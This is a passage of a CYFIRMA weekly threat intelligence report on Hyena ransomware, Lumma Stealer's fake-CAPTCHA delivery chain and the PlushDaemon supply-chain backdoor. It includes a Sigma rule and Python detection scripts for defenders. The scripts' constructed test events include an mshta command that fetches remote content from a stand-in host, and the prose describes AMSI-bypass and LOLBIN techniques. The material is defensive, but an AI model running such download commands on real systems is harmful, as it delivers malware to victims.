Weekly Intelligence Report – 31 Jan 2025

Published On : 2025-01-30

Ransomware of the week

The CYFIRMA Research and Advisory Team would like to highlight ransomware trends and insights gathered while monitoring various forums. This covers multiple industries, geographies, and technologies that could be relevant to your organization.

Type: Ransomware
Target Technologies: MS Windows

Introduction
CYFIRMA Research and Advisory Team has found Hyena Ransomware while monitoring various underground forums as part of our Threat Discovery Process.

Hyena Ransomware
Researchers have identified a new ransomware strain named Hyena, linked to the MedusaLocker family. Hyena encrypts files, appending the “.hyena111” extension, and leaves a ransom note titled “READ_NOTE.html” while altering the desktop wallpaper.

Screenshot of files encrypted by ransomware (Source: Surface Web)

The ransom note informs victims that their network has been breached, and critical files are encrypted using RSA and AES algorithms. It warns against using third-party tools for file recovery, claiming such actions could lead to permanent data loss. The attackers also threaten to leak or sell confidential data if the ransom is not paid.

Victims are offered the chance to decrypt 2–3 non-essential files for free and are instructed to contact the attackers via provided email addresses or a Tor-based chat for negotiations. The note emphasizes that the ransom price will increase after 72 hours.

Appearance of Hyena’s ransom note (“READ_NOTE.html”): (Source: Surface Web)

Screenshot of Hyena’s desktop wallpaper: (Source: Surface Web)

Following are the TTPs based on the MITRE ATT&CK Framework

Tactic ID Technique
Initial Access T1091 Replication Through Removable Media
Execution T1059 Command and Scripting Interpreter
Persistence T1542.003 Pre-OS Boot: Bootkit
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Persistence T1574.002 Hijack Execution Flow: DLL Side-Loading
Privilege Escalation T1055 Process Injection
Privilege Escalation T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Privilege Escalation T1574.002 Hijack Execution Flow: DLL Side-Loading
Defense Evasion T1014 Rootkit
Defense Evasion T1036 Masquerading
Defense Evasion T1055 Process Injection
Defense Evasion T1070.004 Indicator Removal: File Deletion
Defense Evasion T1112 Modify Registry
Defense Evasion T1202 Indirect Command Execution
Defense Evasion T1497 Virtualization/Sandbox Evasion
Defense Evasion T1542.003 Pre-OS Boot: Bootkit
Defense Evasion T1562.001 Impair Defenses: Disable or Modify Tools
Defense Evasion T1564.001 Hide Artifacts: Hidden Files and Directories
Defense Evasion T1574.002 Hijack Execution Flow: DLL Side-Loading
Credential Access T1056 Input Capture
Discovery T1010 Application Window Discovery
Discovery T1012 Query Registry
Discovery T1016 System Network Configuration Discovery
Discovery T1018 Remote System Discovery
Discovery T1082 System Information Discovery
Discovery T1083 File and Directory Discovery
Discovery T1120 Peripheral Device Discovery
Discovery T1497 Virtualization/Sandbox Evasion
Discovery T1518.001 Software Discovery: Security Software Discovery
Lateral Movement T1091 Replication Through Removable Media
Collection T1056 Input Capture
Collection T1074 Data Staged
Command and Control T1071 Application Layer Protocol
Command and Control T1095 Non-Application Layer Protocol
Command and Control T1573 Encrypted Channel
Impact T1485 Data Destruction
Impact T1486 Data Encrypted for Impact
Impact T1490 Inhibit System Recovery
Impact T1496 Resource Hijacking

Relevancy and Insights:

  • This ransomware specifically targets the widely used Windows Operating System, which is prevalent across numerous industries and organizations.
  • Detect-Debug-Environment: Debugging environments are used by developers to analyze and troubleshoot software. The ransomware uses this technique to determine whether it is operating in a debug environment. This feature aids the ransomware in avoiding analysis and detection attempts.
  • Calls to WMI: The ransomware is making calls to the Windows Management Instrumentation (WMI) framework. WMI is a powerful tool used by many legitimate applications and services, but it can also be exploited by malware to execute commands, collect information, or perform system modifications.
  • The ransomware’s attempt to delete Volume Shadow Copies (VSS) indicates a deliberate effort to hinder data recovery options for victims.

ETLM Assessment:
CYFIRMA’s analysis of available data reveals that MedusaLocker ransomware has been actively targeting diverse sectors including manufacturing, healthcare, finance, IT services and others since 2019. The emergence of Hyena ransomware, an advanced variant of MedusaLocker, suggests the adoption of enhanced evasion techniques aimed at expanding its reach to both individuals and enterprises. Projections indicate it will continue to impact key industries globally, highlighting the critical need for robust cybersecurity measures to effectively counter these evolving threats.

Sigma rule:
title: New RUN Key Pointing to Suspicious Folder
tags:
    - attack.persistence
    - attack.t1547.001
logsource:
    category: registry_set
    product: windows
detection:
    selection_target:
        TargetObject|contains:
            - '\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\'
            - '\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\'
    selection_details:
        - Details|contains:
            - ':\$Recycle.bin\'
            - ':\Temp\'
            - ':\Users\Default\'
            - ':\Users\Desktop\'
            - ':\Users\Public\'
            - ':\Windows\Temp\'
            - '\AppData\Local\Temp\'
            - '%temp%\'
            - '%tmp%\'
        - Details|startswith:
            - '%Public%\'
            - 'wscript'
            - 'cscript'
    filter_main_windows_update:
        TargetObject|contains: '\Microsoft\Windows\CurrentVersion\RunOnce\'
        Image|startswith: 'C:\Windows\SoftwareDistribution\Download\'
        Details|contains|all:
            - 'rundll32.exe '
            - 'C:\WINDOWS\system32\advpack.dll,DelNodeRunDLL32'
        Details|contains:
            - '\AppData\Local\Temp\'
            - 'C:\Windows\Temp\'
    condition: all of selection_* and not 1 of filter_main_*
falsepositives:
    - Software using weird folders for updates
level: high
(Source: Surface Web)
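As an added example (not from the report or from the Sigma project), the Python below evaluates the rule above over constructed registry_set events, reproducing Sigma's semantics: fields inside one map are AND-ed, a list of maps under a selection is OR-ed, string modifiers match case-insensitively, and the Windows Update filter suppresses an otherwise-matching RunOnce write. The event field layout (TargetObject, Details, Image) and helper names are assumptions; in production a Sigma backend compiles the rule for your SIEM instead.

```python
"""Evaluator for 'New RUN Key Pointing to Suspicious Folder' over constructed
registry_set events. Added example; field layout and helper names are assumptions."""

# Pattern values copied from the rule. Backslashes are doubled for Python.
RUN_KEYS = [
    "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\",
    "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\",
]
SUSPICIOUS_DETAILS_CONTAINS = [
    ":\\$Recycle.bin\\", ":\\Temp\\", ":\\Users\\Default\\", ":\\Users\\Desktop\\",
    ":\\Users\\Public\\", ":\\Windows\\Temp\\", "\\AppData\\Local\\Temp\\",
    "%temp%\\", "%tmp%\\",
]
SUSPICIOUS_DETAILS_STARTSWITH = ["%Public%\\", "wscript", "cscript"]

# filter_main_windows_update: Windows Update cleanup writes a RunOnce value that
# points into a Temp folder, so the rule excludes that exact combination.
FILTER_RUNONCE = "\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\"
FILTER_IMAGE_PREFIX = "C:\\Windows\\SoftwareDistribution\\Download\\"
FILTER_DETAILS_ALL = ["rundll32.exe ", "C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32"]
FILTER_DETAILS_ANY = ["\\AppData\\Local\\Temp\\", "C:\\Windows\\Temp\\"]


def _contains_any(value, needles):      # Sigma |contains (case-insensitive)
    v = value.lower()
    return any(n.lower() in v for n in needles)

def _startswith_any(value, needles):    # Sigma |startswith (case-insensitive)
    v = value.lower()
    return any(v.startswith(n.lower()) for n in needles)

def _contains_all(value, needles):      # Sigma |contains|all
    v = value.lower()
    return all(n.lower() in v for n in needles)


def selection_target(event):
    return _contains_any(event.get("TargetObject", ""), RUN_KEYS)

def selection_details(event):
    # Two maps listed under selection_details are OR-ed together.
    details = event.get("Details", "")
    return (_contains_any(details, SUSPICIOUS_DETAILS_CONTAINS)
            or _startswith_any(details, SUSPICIOUS_DETAILS_STARTSWITH))

def filter_main_windows_update(event):
    # Four fields in a single map: all must hold for the filter to apply.
    details = event.get("Details", "")
    return (_contains_any(event.get("TargetObject", ""), [FILTER_RUNONCE])
            and _startswith_any(event.get("Image", ""), [FILTER_IMAGE_PREFIX])
            and _contains_all(details, FILTER_DETAILS_ALL)
            and _contains_any(details, FILTER_DETAILS_ANY))

def matches(event):
    """condition: all of selection_* and not 1 of filter_main_*"""
    return (selection_target(event) and selection_details(event)
            and not filter_main_windows_update(event))


# Constructed sample events (not real telemetry).
CONSTRUCTED_EVENTS = [
    # 0: Run value pointing into the user's Temp folder -> the pattern the rule targets.
    {"TargetObject": "HKU\\S-1-5-21-1111\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater",
     "Details": "C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe",
     "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe"},
    # 1: Run value pointing into Program Files -> no suspicious folder, no alert.
    {"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\OneDrive",
     "Details": "C:\\Program Files\\Microsoft OneDrive\\OneDrive.exe",
     "Image": "C:\\Windows\\explorer.exe"},
    # 2: Windows Update cleanup job -> matches the selections but is suppressed by the filter.
    {"TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\wudf",
     "Details": "rundll32.exe C:\\WINDOWS\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Windows\\Temp\\abc\"",
     "Image": "C:\\Windows\\SoftwareDistribution\\Download\\Install\\setup.exe"},
    # 3: RunOnce value that launches wscript -> matches via Details|startswith.
    {"TargetObject": "HKU\\S-1-5-21-1111\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\note",
     "Details": "wscript.exe //B C:\\ProgramData\\note.vbs",
     "Image": "C:\\Windows\\System32\\cmd.exe"},
]

def alerting_indices(events=CONSTRUCTED_EVENTS):
    """Indices of events the rule would alert on."""
    return [i for i, e in enumerate(events) if matches(e)]

if __name__ == "__main__":
    print(alerting_indices())  # [0, 3]
```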

IOCs:
Kindly refer to the IOCs section to exercise control of your security systems.

STRATEGIC RECOMMENDATION

  • Implement strong security controls, including encryption, authentication, and access-credential configuration, for access to critical systems in your cloud and local environments.
  • Ensure that backups of critical systems are maintained which can be used to restore data in case a need arises.

MANAGEMENT RECOMMENDATION

  • A data breach prevention plan must be developed considering (a) the type of data being managed by the company; (b) the remediation process; (c) where and how the data is stored; (d) whether there is an obligation to notify the local authority.
  • Enable zero-trust architecture and multifactor authentication (MFA) to mitigate the compromise of credentials.
  • Foster a culture of cybersecurity, where you encourage and invest in employee training so that security is an integral part of your organization.

TACTICAL RECOMMENDATION

  • Regularly update all applications and software to the latest versions and apply security patches.
  • Deploy the Sigma rule above for threat detection and monitoring; it helps detect anomalies in log events and identify and monitor suspicious activity.
  • Build and undertake safeguarding measures by monitoring/blocking the IOCs and strengthening defence based on the tactical intelligence provided.

Trending Malware of the Week

Type: Information Stealer | Objectives: Data theft | Target Industries: Telecom, Healthcare, Banking, Marketing | Target Geographies: United States, Argentina, Colombia, Philippines | Target Technology: Windows OS

CYFIRMA collects data from various forums, based on which the trend is ascertained. We identified a few popular malware families that were found to be distributed in the wild to launch cyberattacks on organizations or individuals.

Active Malware of the week
This week “Lumma Stealer” is trending.

Lumma Stealer
Researchers have identified a global malware campaign leveraging fake CAPTCHAs to deliver Lumma Stealer, a malware-as-a-service (MaaS) threat active since 2022. This campaign targets victims across industries such as telecom, healthcare, banking, and marketing, with notable activity in countries like the United States, Argentina, Colombia, and the Philippines. The attackers utilize various delivery methods, such as cracked software, Discord’s CDN, and fake CAPTCHA pages. The infection chain employs diverse techniques, including process hollowing and PowerShell one-liners. The campaign introduces new payloads, malicious websites leveraging malvertising, and sophisticated strategies to bypass security controls. Notably, attackers instruct victims to execute commands via the Windows Run command, effectively evading browser-based defenses. Additionally, the use of open-source snippets to bypass the Windows Antimalware Scan Interface (AMSI) further enhances the malware’s ability to remain undetected.

Fig: Infection Chain

Attack Method
The infection process begins when a victim visits a website that redirects them to a fake CAPTCHA page. This deceptive CAPTCHA instructs the user to follow specific actions, initiating the next stage of the malware installation process. Since August 2024, Lumma Stealer has employed this tactic to trick users into running commands on their computers, effectively launching the infection. These fake CAPTCHAs are a sophisticated social engineering strategy, designed to make users unknowingly download and execute malware outside their browser. Even cautious users may fail to realize the implications of following these instructions. Executing the malware outside the browser also helps bypass browser-based security controls, making detection more challenging. In a recent campaign, the fake CAPTCHA instructs victims to open the Windows Run window using Windows+R, paste the clipboard’s content with CTRL+V, and press ENTER to execute it. This sequence, tailored for Windows environments, is crucial for the malware’s deployment.

Fig: Fake CAPTCHA instruction

The website hosting the fake CAPTCHA uses a hidden JavaScript snippet to add a malicious command to the victim’s clipboard. This command utilizes the Windows tool mshta.exe to download and execute a file from a remote server. By leveraging mshta, a trusted Windows utility, attackers employ a technique known as LOLBIN (living-off-the-land binary) to bypass security defenses by executing malicious code through legitimate system processes. Since the entire process occurs outside the browser, it effectively avoids detection by browser-based security measures.

Fig: Example of the malicious command in the Run window

The observed payloads in this campaign disguise themselves with misleading file extensions like .mp3 or .accdb, but their contents reveal a mix of random data, malicious JavaScript, and incorrect file types. Once executed, the JavaScript invokes PowerShell to decode a base64-encoded data chunk, triggering the download and execution of a second-stage payload on the victim’s machine. This second-stage payload is an obfuscated PowerShell script that performs several tasks. It deobfuscates strings, generates a key (“AMSI_RESULT_NOT_DETECTED”), and uses base64 decoding with a multi-byte XOR operation to extract another PowerShell script. This script employs a clever evasion tactic by modifying the memory of the “clr.dll” module to bypass the Windows Antimalware Scan Interface (AMSI), preventing its detection. Finally, the script decodes another base64 chunk into a PE file, which it loads and executes via reflection. This process ultimately delivers Lumma Stealer as the final payload.
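The Run-dialog stage described above leaves a recognizable process-creation footprint: mshta.exe spawned directly by the shell with a remote URL on its command line, often pointing at a file with a disguised extension such as .mp3 or .accdb. The following detection logic, added here as an example and not part of the report, scores constructed Sysmon-style Event ID 1 records on those three traits; the field names (Image, ParentImage, CommandLine) follow Sysmon, and the sample events are constructed.

```python
"""Flag mshta.exe launched from the Run dialog with a remote payload URL.
Added example over constructed process-creation events; field names assume Sysmon."""
import re
from urllib.parse import urlparse

# Extensions the report says the downloaded payloads hide behind.
DISGUISE_EXTENSIONS = {".mp3", ".accdb"}
URL_RE = re.compile(r'''https?://[^\s'"]+''', re.IGNORECASE)


def remote_urls(command_line):
    """All http(s) URLs present on the command line."""
    return URL_RE.findall(command_line)

def url_extension(url):
    """Lower-cased extension of the URL's last path segment ('' if none)."""
    name = urlparse(url).path.rsplit("/", 1)[-1].lower()
    return name[name.rfind("."):] if "." in name else ""

def classify(event):
    """Return the reasons an event is suspicious; an empty list means benign."""
    image = event.get("Image", "").lower()
    if not image.endswith("\\mshta.exe"):
        return []
    reasons = []
    urls = remote_urls(event.get("CommandLine", ""))
    if urls:
        # mshta pulling content from a remote server is the LOLBIN pattern itself.
        reasons.append("mshta fetching remote content")
        for url in urls:
            ext = url_extension(url)
            if ext in DISGUISE_EXTENSIONS:
                reasons.append(f"remote file with disguised extension {ext}")
        # The Run dialog is hosted by explorer.exe, so a pasted command shows up
        # as mshta.exe whose parent is the shell rather than a browser or installer.
        if event.get("ParentImage", "").lower().endswith("\\explorer.exe"):
            reasons.append("launched from the shell (Run dialog pattern)")
    return reasons


# Constructed sample events (not real telemetry).
CONSTRUCTED_EVENTS = [
    # 0: the fake-CAPTCHA chain: explorer.exe -> mshta.exe with a remote ".mp3".
    {"Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "mshta https://cdn.example.invalid/media/track01.mp3"},
    # 1: mshta loading a local .hta from an installer -> no remote URL, benign here.
    {"Image": "C:\\Windows\\System32\\mshta.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "mshta.exe \"C:\\Program Files\\Vendor\\setup.hta\""},
    # 2: a different binary with a URL argument -> out of scope for this rule.
    {"Image": "C:\\Windows\\System32\\notepad.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "notepad.exe https://example.invalid/notes.mp3"},
]

def scan(events=CONSTRUCTED_EVENTS):
    """Map event index -> reasons, for events that produced at least one reason."""
    findings = {}
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            findings[i] = reasons
    return findings

if __name__ == "__main__":
    for idx, reasons in scan().items():
        print(idx, "; ".join(reasons))
```

Treat the shell-parent reason as the strongest of the three: legitimate mshta use from explorer.exe with a remote URL is rare, whereas URL fetches alone also occur in some enterprise HTA deployments.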

INSIGHTS

  • Lumma Stealer’s emergence in the malware-as-a-service (MaaS) ecosystem highlights the growing sophistication and accessibility of cybercrime tools. As a global threat, it represents a significant evolution in how attackers scale their operations to target diverse industries such as telecom, healthcare, and banking. The malware’s use of creative social engineering techniques, such as fake CAPTCHAs, showcases how attackers continue to exploit human behavior to bypass conventional cybersecurity defenses. This approach not only broadens the reach of these campaigns but also raises concerns about vulnerabilities in user awareness and behavior.
  • What sets Lumma Stealer apart is its adaptability in exploiting trusted tools and processes to remain undetected. By leveraging legitimate system utilities like mshta.exe and employing open-source techniques to bypass detection mechanisms, it highlights a clear shift toward exploiting the inherent trust in technology. This approach effectively lowers the barrier for cybercriminals, enabling them to target even organizations with robust defenses. Its ability to evade browser-based defenses by executing payloads outside the browser adds an additional layer of complexity for cybersecurity teams attempting to track and mitigate such attacks.
  • The infection chain employed by Lumma Stealer is not only diverse but also heavily obfuscated, incorporating advanced techniques such as PowerShell-based operations. The use of obfuscated scripts and memory manipulation to bypass the Windows Antimalware Scan Interface (AMSI) highlights the sophistication of its design. These methods ensure the malware can deliver its final payload without triggering red flags, enabling it to steal sensitive data effectively. Such campaigns underscore the increasing complexity of modern malware, necessitating continuous adaptation from cybersecurity teams.

ETLM ASSESSMENT
From the ETLM perspective, CYFIRMA anticipates that as Lumma Stealer continues to evolve, its ability to adapt to various attack vectors and exploit social engineering techniques could increase the difficulty for organizations to defend against it. The malware’s reliance on legitimate system processes and clever evasion tactics may allow it to bypass traditional security defenses, making it crucial for organizations to adopt broader, more comprehensive protection strategies. As the malware evolves, it could also expand its geographical reach, affecting organizations across different regions. Beyond direct financial or data losses, Lumma Stealer campaigns may erode trust within affected industries, especially as compromised credentials could facilitate secondary attacks, such as customer data breaches or supply chain disruptions. The continued growth of the malware-as-a-service model is likely to encourage similar threats, urging organizations to strengthen proactive and adaptive security measures through enhanced training, advanced detection tools, and cross-industry collaboration.

IOCs:
Kindly refer to the IOCs Section to exercise controls on your security systems.

Recommendations:

STRATEGIC:

  • Deploy an Extended Detection and Response (XDR) solution as part of the organization’s layered security strategy that provides detection/prevention for malware and malicious activities that do not rely on signature-based detection methods.
  • Configure organization’s intrusion detection systems (IDS), intrusion prevention systems (IPS), or any network defence mechanisms in place to alert on — and upon review, consider blocking connection attempts to and from — the external IP addresses and domains listed in the appendix.

MANAGEMENT:

  • Provide your staff with basic cybersecurity hygiene training since many targeted attacks start with phishing or other social engineering techniques.
  • Move beyond the traditional model of security awareness toward improved simulation and training exercises that mimic real attack scenarios, account for behaviors that lead to a compromise, and are measured against real attacks the organization receives.

TACTICAL RECOMMENDATIONS

  • Build and undertake safeguarding measures by monitoring/blocking the IOCs and strengthening defence based on the tactical intelligence provided.
  • Install anti-APT and EDR solutions that enable threat discovery and detection, investigation, and timely remediation of incidents.
  • Strengthen boundary defense such as network segmentation and have a strong access management capability in line with the Principle of Least Privilege (POLP) that can assist in mitigating cyberattacks.

CYFIRMA’S WEEKLY INSIGHTS

1. Weekly Attack Types and Trends

Key Intelligence Signals:

  • Attack Type: Ransomware Attacks, Malware Implant, Vulnerabilities & Exploits, Data Leaks.
  • Objective: Unauthorized Access, Data Theft, Data Encryption, Financial Gains, Espionage.
  • Business Impact: Data Loss, Financial Loss, Reputational Damage, Loss of Intellectual Property, Operational Disruption.
  • Ransomware – Lynx Ransomware, Hunters International Ransomware | Malware – Lumma Stealer
  • Lynx Ransomware – One of the ransomware groups.
  • Hunters International Ransomware – One of the ransomware groups.
  • Please refer to the trending malware advisory for details on the following:
  • Malware – Lumma Stealer
  • Behavior – Most of these malware families use phishing and social engineering techniques as their initial attack vectors. Apart from these techniques, exploitation of vulnerabilities, defense evasion, and persistence tactics are being observed.

2. Threat Actor in Focus

PlushDaemon infiltrates the supply chain of a Korean VPN service.

  • Threat actor: PlushDaemon
  • Initial Attack Vector: Malware implant
  • Objective: Espionage
  • Target Technology: VPN Services
  • Target Geography: China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand.
  • Business Impact: Data exfiltration

Summary:
Recently, a sophisticated supply-chain attack was identified targeting a South Korean VPN provider. Attackers compromised the VPN’s installer, embedding a malicious backdoor alongside the legitimate software. This backdoor, known as SlowStepper, is a feature-rich tool with over 30 components designed for extensive cyberespionage activities.

The initial infection vector involved users downloading a ZIP archive containing the compromised installer from the VPN provider’s official website. Upon execution, the installer deployed both the legitimate VPN application and the SlowStepper backdoor. Persistence was achieved by adding a registry entry, ensuring the backdoor’s execution upon system startup.

SlowStepper operates through a multistage command-and-control (C&C) protocol utilizing DNS. It has the capability to download and execute numerous additional modules, primarily written in Python and Go, enhancing its espionage functionalities. These modules enable the malware to collect a wide range of data, including system details, running processes, installed applications, and network interfaces.

Furthermore, it can capture audio and video recordings, take photos, scan for documents, and extract information from various applications, including messaging platforms like WeChat and Telegram. Credential theft is also within its capabilities, posing significant risks to affected users.

The attackers’ primary method of initial access involves hijacking legitimate updates of applications by redirecting traffic to servers under their control. Additionally, they have been observed exploiting vulnerabilities in legitimate web servers to gain unauthorized access.

This campaign has been active since at least 2019, targeting individuals and entities across multiple regions, including mainland China, Taiwan, Hong Kong, South Korea, the United States, and New Zealand. The extensive toolkit and prolonged activity underscore the attackers’ commitment to developing a wide array of tools, making them a significant threat in the cyber landscape.

In response to the discovery, the compromised installer was promptly removed from the VPN provider’s website. However, users who downloaded the installer during the affected period are advised to conduct thorough security assessments to identify and remediate potential infections.

Relevancy & Insights:
The PlushDaemon threat actor group is a China-aligned sophisticated cyberespionage collective, primarily targeting East Asia, including South Korea, Taiwan, Hong Kong, and mainland China, with additional operations in the United States and New Zealand. The group is known for exploiting supply chain vulnerabilities and using trusted technologies such as VPNs and software updates to deploy malware. In one instance, they embedded a backdoor within a legitimate VPN installer.

Previously, PlushDaemon has taken advantage of web server vulnerabilities and DNS-based command-and-control (C&C) methods. Their toolkit consists of modular malware, reflecting the group’s adaptable and evolving tactics. With a focus on credential theft, data exfiltration, and surveillance, PlushDaemon’s operations demonstrate an ongoing refinement of their techniques.

ETLM Assessment:
PlushDaemon has a history of targeting across East Asia and beyond. Their operations often exploit trusted supply chains, allowing them to infiltrate networks with little chance of detection. The group is known for using sophisticated tactics, including modular malware and DNS-based command-and-control (C&C) techniques, to ensure long-term persistence and stealth.

They have frequently hijacked legitimate software updates or exploited vulnerabilities in web servers, tactics consistent with their past activity. PlushDaemon typically focuses on high-value targets in regions such as mainland China, South Korea, Taiwan, and Hong Kong, reflecting their strategic geopolitical interests.

Recommendations:

Strategic Recommendations:

  • Supply Chain Risk Management:
    • Implement a comprehensive supply chain risk management program to assess and monitor the security practices of third-party vendors and partners.
    • Establish contractual security requirements and conduct regular audits to ensure compliance.
  • Threat Intelligence Integration:
    • Continuously integrate threat intelligence feeds into your security operations to stay informed about emerging threats like PlushDaemon.

Tactical Recommendations:

  • Enhanced Monitoring and Detection:
    • Configure your Security Information and Event Management (SIEM) system to monitor indicators of compromise (IoCs) associated with SlowStepper and related malicious activities.
    • Implement behavioral analytics to detect anomalies in software installation processes and network communications.
  • Application Whitelisting:
    • Deploy application whitelisting to ensure that only authorized software can be executed within your environment, reducing the risk of malicious installers being executed.

Operational Recommendations:

  • Patch Management:
    • Regularly update and patch all software and systems to mitigate vulnerabilities that could be exploited by threat actors.
    • Prioritize patches for software commonly targeted in supply chain attacks.
  • User Training and Awareness:
    • Conduct regular security awareness training sessions to educate employees on the risks associated with downloading and installing software from unverified sources.
    • Encourage users to report any suspicious activities or anomalies promptly.
  • Incident Response Preparedness:
    • Ensure that your Security Operations Center (SOC) is equipped to respond swiftly to supply chain-related incidents.
    • Regularly test and update incident response plans to address scenarios involving compromised third-party software.

MITRE FRAMEWORK
Tactic ID Technique
Resource Development T1583.001 Acquire Infrastructure: Domains
Resource Development T1583.004 Acquire Infrastructure: Server
Resource Development T1608.001 Stage Capabilities: Upload Malware
Resource Development T1608.002 Stage Capabilities: Upload Tool
Resource Development T1588.001 Obtain Capabilities: Malware
Resource Development T1588.002 Obtain Capabilities: Tool
Resource Development T1588.003 Obtain Capabilities: Code Signing Certificates
Resource Development T1588.005 Obtain Capabilities: Exploits
Initial Access T1659 Content Injection
Initial Access T1190 Exploit Public-Facing Application
Initial Access T1195.002 Supply Chain Compromise: Compromise Software Supply Chain
Execution T1059.003 Command and Scripting Interpreter: Windows Command Shell
Execution T1059.006 Command and Scripting Interpreter: Python
Persistence T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
Persistence T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL
Persistence T1574.002 Hijack Execution Flow: DLL Side-Loading
Defense Evasion T1222.001 File and Directory Permissions Modification: Windows File and Directory Permissions Modification
Defense Evasion T1070.004 Indicator Removal: File Deletion
Defense Evasion T1036.005 Masquerading: Match Legitimate Name or Location
Defense Evasion T1112 Modify Registry
Defense Evasion T1027.007 Obfuscated Files or Information: Dynamic API Resolution
Defense Evasion T1027.009 Obfuscated Files or Information: Embedded Payloads
Defense Evasion T1027.013 Obfuscated Files or Information: Encrypted/Encoded File
Defense Evasion T1553.002 Subvert Trust Controls: Code Signing
Discovery T1217 Browser Information Discovery
Discovery T1083 File and Directory Discovery
Discovery T1120 Peripheral Device Discovery
Discovery T1057 Process Discovery
Discovery T1012 Query Registry
Discovery T1518 Software Discovery
Discovery T1082 System Information Discovery
Discovery T1614 System Location Discovery
Discovery T1016 System Network Configuration Discovery
Discovery T1016.002 System Network Configuration Discovery: Wi-Fi Discovery
Discovery T1033 System Owner/User Discovery
Collection T1560.002 Archive Collected Data: Archive via Library
Collection T1123 Audio Capture
Collection T1005 Data from Local System
Collection T1074.001 Data Staged: Local Data Staging
Collection T1113 Screen Capture
Collection T1125 Video Capture
Command and Control T1071.004 Application Layer Protocol: DNS
Command and Control T1132.001 Data Encoding: Standard Encoding
Command and Control T1573.001 Encrypted Channel: Symmetric Cryptography
Command and Control T1008 Fallback Channels
Command and Control T1105 Remote File Copy
Command and Control T1104 Multi-Stage Channels
Command and Control T1095 Standard Non-Application Layer Protocol
Command and Control T1090 Connection Proxy
Command and Control T1219 Remote Access Tools
Exfiltration T1020 Automated Exfiltration
Exfiltration T1041 Exfiltration Over C2 Channel

IOCs:
Kindly refer to the IOCs (Indicators of Compromise) Section to exercise controls on your security systems.

3. Major Geopolitical Developments in Cybersecurity

EU sanctions three GRU officers for cyberattacks against Estonia
The European Union imposed sanctions on three Russian nationals for orchestrating cyberattacks against Estonia in 2020. The EU identified the individuals as officers of the GRU’s 161st Specialist Training Center, also known as Unit 29155.

In a statement, the EU explained that the attacks provided unauthorized access to classified and sensitive data from multiple government ministries, including Economic Affairs and Communications, Social Affairs, and Foreign Affairs. As a result, thousands of confidential documents—containing business secrets, health records, and other critical information—were stolen, jeopardizing the security of the affected institutions. The EU also attributed other cyberattacks against its member states and partners, particularly Ukraine, to Unit 29155.

With the latest enforcement action, a total of 17 individuals and four entities are subject to asset freezes and travel bans, and EU persons and entities are prohibited from transacting with those listed.

ETLM Assessment:
Unit 29155 has previously been accused by the U.S. government and its allies of carrying out cyberattacks targeting government services, financial institutions, transportation systems, energy infrastructure, and healthcare sectors across NATO member states, the European Union, as well as countries in Central America and Asia.

Since at least early 2022, the group is believed to have actively disrupted efforts to provide aid to Ukraine. Within the cybersecurity community, this threat actor is tracked under various names, including Cadet Blizzard, Ember Bear, FROZENVISTA, Nodaria, Ruinous Ursa, UAC-0056, and UNC2589.

Notably, Korchagin and Denisov have been charged by the U.S. Department of Justice (DoJ) for their alleged roles in a conspiracy to commit computer intrusion and wire fraud, targeting Ukraine, the U.S., and 25 other NATO countries.

President Trump indicates new tariffs on computer chips and semiconductors
President Donald Trump said he would soon announce new tariffs on computer chips, repeating a campaign promise that if enacted could have deep impacts on the global tech industry and the geopolitical battle over AI with China.

“In the very near future we’re going to be placing tariffs on foreign production of computer chips, semiconductors, and pharmaceuticals to return production of these essential goods to the United States of America,” Trump said at a retreat of House Republicans at his Doral golf resort in Miami.

Trump said he wanted the manufacturers of semiconductors and chips — which are used in many high-end consumer electronics and sophisticated AI-powered technology and research — to open factories in the United States and would use the threat of high taxes and tariffs to force them to relocate. “They’re not going to want to pay a 25, 50 or even 100 percent tax,” Trump said. “If you want to stop paying the taxes or the tariffs, you have to build your plant right here in America.”

ETLM Assessment:
The news comes on the back of the recent announcement of technical advancements by Chinese AI startup DeepSeek, shortly followed by a similar announcement from another Chinese company, Alibaba. These rattled tech stocks in the US and showed the world that semiconductor restrictions that the previous US administration placed on China are not working as intended and U.S. companies will need to intensify their efforts to maintain the country’s leadership in artificial intelligence.

The disruptions in the semiconductor market are going to be one of the most intense areas of strategic competition between the US and China and we should expect a lot of state-sponsored cyber activity in the field in the coming years.

4. Rise in Malware / Ransomware and Phishing

The Lynx Ransomware Impacts Marukai

  • Attack Type: Ransomware
  • Target Industry: Retail
  • Target Geography: Japan, The United States of America
  • Ransomware: Lynx Ransomware
  • Objective: Data Theft, Data Encryption, Financial Gains
  • Business Impact: Financial Loss, Data Loss, Reputational Damage

Summary
From the External Threat Landscape Management (ETLM) perspective, CYFIRMA observed in an underground forum that a company from Japan, Marukai (www[.]marukai[.]com), was compromised by Lynx Ransomware. Marukai Corporation (d.b.a. Tokyo Central) opened its business as one of the first international Japan-based retailers in the US market. Marukai offers a wide variety of imported Japanese goods such as food, health products, cosmetics, home furnishings, electric appliances, stationery, clothing, pottery, and many other specialty goods. The compromised data consists of confidential and sensitive information related to the organization.

Source: Dark Web

Relevancy & Insights:

